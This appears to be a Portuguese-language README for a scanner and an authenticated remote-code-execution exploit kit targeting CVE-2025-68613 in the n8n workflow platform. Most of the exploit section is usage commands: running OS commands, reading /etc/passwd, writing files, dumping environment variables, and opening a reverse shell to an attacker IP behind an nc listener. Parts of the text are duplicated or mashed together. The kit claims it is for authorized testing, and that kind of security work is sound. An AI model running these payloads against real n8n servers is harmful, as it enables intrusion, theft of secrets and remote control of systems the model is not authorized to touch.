Exploit PoC de RCE autenticado e scanner de vulnerabilidades para CVE-2025-68613 no n8n. Suporta execução de comandos, operações de arquivos e payloads de reverse shell para testes de segurança autorizados.
Este kit fornece scanner e PoC de exploit para a vulnerabilidade crítica
CVE-2025-68613 na Plataforma de Automação de Fluxo de Trabalho n8n.
Este repositório fornece scripts de scanner e PoC de exploit para a vulnerabilidade crítica
CVE-2025-68613 que afeta a Plataforma de Automação de Fluxo de Trabalho n8n.
Esta ferramenta é APENAS para testes de segurança AUTORIZADOS e LEGÍTIMOS.
É proibido usar esta ferramenta em sistemas sem permissão do proprietário.
Esta ferramenta é APENAS para testes de segurança autorizados e legais. O uso não autorizado é ilegal e proibido.
0.211.0 – 1.120.31.121.01.120.4+1.121.1+1.122.0+.
├── tot-scanner-2025-68613.py # Vulnerability Scanner (NO exploit)
├── tot-exploit-2025-68613.py # Authenticated RCE Exploit PoC
├── requirements.txt
└── README.md
O scanner é usado para:
O scanner:
O scanner verifica os seguintes endpoints:
//rest/settings/healthz/api/v1/healthPacotes necessários:
Conteúdo do arquivo requirements.txt:
requests>=2.28.0
Pacotes necessários:
Conteúdo do requirements.txt:
requests>=2.28.0
pip install -r requirements.txt
python3 tot-scanner-2025-68613.py -u http://target.com:5678
python3 tot-scanner-2025-68613.py -u http://target.com:5678 --json
{
"target": "http://target.com:5678",
"detected": true,
"version": "1.121.0",
"vulnerable": true,
"status": "vulnerable",
"cve": "CVE-2025-68613"
}
| Código | Significado |
|---|---|
| 0 | Não vulnerável |
| 1 | Versão desconhecida |
| 2 | Vulnerável |
Este exploit REQUER credenciais válidas do n8n
Acesso autenticado é OBRIGATÓRIO
O exploit funciona da seguinte forma:
Set| Argumento | Obrigatório | Descrição |
|---|---|---|
-u / --url | ✅ | URL alvo do n8n |
-e / --email | ✅ | Email da conta n8n |
-p / --password | ✅ | Senha da conta n8n |
--payload | ✅ | Tipo de payload |
--command | ❌ | Comando do SO (cmd) |
--file | ❌ | Caminho do arquivo (read/write) |
--content | ❌ | Conteúdo do arquivo (write) |
--lhost | ❌ | IP do atacante (revshell) |
--lport | ❌ | Porta do atacante (revshell) |
--verify-ssl | ❌ | Verificar certificado SSL |
| Payload | Função |
|---|---|
info | Informações do sistema |
cmd | Execução de comando |
env | Dump de variáveis de ambiente |
read | Ler arquivo |
write | Escrever arquivo |
revshell | Reverse shell |

python3 tot-exploit-2025-68613.py -u http://target.com:5678 -e [email protected] -p password --payload info
python3 tot-exploit-2025-68613.py -u http://target.com:5678 -e [email protected] -p password --payload cmd --command "id"
python3 tot-exploit-2025-68613.py -u http://target.com:5678 -e [email protected] -p password --payload read --file /etc/passwd
python3 tot-exploit-2025-68613.py -u http://target.com:5678 -e [email protected] -p password --payload write --file /tmp/pwned.txt --content "owned"
nc -lvnp 4444
python3 tot-exploit-2025-68613.py -u http://target.com:5678 -e [email protected] -p password --payload revshell --lhost 10.10.14.5 --lport 4444
/rest/*Este projeto é fornecido apenas para fins educacionais e testes de segurança autorizados.
O autor não é responsável pelo uso indevido.
n8n
cve
cve-2025-68613
rce
expression-injection
security
pentest
red-team
blue-team
python
Mantenha-se legal. Mantenha-se ético.